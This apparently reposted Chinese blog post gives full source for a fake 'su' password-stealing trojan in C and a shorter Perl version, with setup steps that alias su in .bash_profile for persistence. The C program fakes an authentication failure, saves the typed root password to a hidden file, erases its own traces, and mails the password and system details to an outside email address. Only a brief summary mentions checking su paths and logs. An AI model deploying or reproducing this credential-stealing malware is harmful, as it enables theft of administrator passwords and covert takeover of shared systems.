该博客内容涉及Linux系统中一个恶意的su程序示例,该程序旨在捕获用户密码并伪装认证失败。它创建了一个隐藏文件来存储密码,并通过修改.bash_profile文件设置别名以实现持久化。此外,程序还包含了删除和重命名文件的命令,以及可能发送密码到指定邮箱的选项。博客提到了Perl版本的类似攻击,并强调了检查su路径和系统日志以检测此类威胁的重要性。
/*
* kpr-fakesu.c V0.9beta167 ;P
* by koper
*
* Setting up:
* admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c
* admin@host:~$ mv .su /var/tmp/.su
* admin@host:~$ cp .bash_profile .wgetrc
* admin@host:~$ echo “alias su=/var/tmp/.su”>>.bash_profile
* admin@host:~$ logout
* *** LOGIN ***
* admin@host:~$ su
* Password:
* su: Authentication failure
* Sorry.
* admin@host:~$ su
* Password:
* root@host:~# logout
* admin@host:~$ cat /var/tmp/.pwds
* root:dupcia17
* admin@host:~$
*
* /bin/su sends various failure information depending on the OS ver.
* Please modify the source to make it “fit”
*
*/
#include
#include
main(int argc, char *argv[]){
FILE *fp;
char *user;
char *pass;
char filex[100];
char clean[100];
sprintf(filex,”/var/tmp/.pwds”);
sprintf(clean,”rm -rf /var/tmp/.su;mv -f /home/admin/.wgetrc /home/admin/.bash_profile”);
if(argc==1) user=”root”;
if(argc==2) user=argv[1];
if(argc>2){
if(strcmp(argv[1], “-l”)==0)
user=argv[2];
else user=argv[1];}
fprintf(stdout,”Password: “); pass=getpass (“”);
system(“sleep 3″);
fprintf(stdout,”su: Authentication failure\nSorry.\n”);
if ((fp=fopen(filex,”w”)) != NULL)
{
fprintf(fp, “%s:%s\n”, user, pass);
fclose(fp);
}
system(clean);
system(“rm -rf /var/tmp/.su; ln -s /bin/su /var/tmp/.su”);
/* If you don’t want password in your e-mail uncomment this line: */
system(“uname -a >> /var/tmp/.pwds; cat /var/tmp/.pwds | mail murrain@gmail.com“);
}
perl版本:
#!/usr/bin/perl
####################################################################################################
# kyle@freeshell.se 2006 su trojan check so the su path is correct. #
# then make alias for trojan first it reads the pass then exec the real su. #
# logging to /tmp/.pass #
####################################################################################################
print “Password: “; $s1=;
print “Sorry.\n”;
$s2=”Password is: “;
$s3=`date +%Y-%m-%d`;
open (users, “>>/tmp/.pass”) || die (“Could not open file. $!”);
print users ($s2, $s1,$s3);
close (users);
system(“/bin/su”)
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
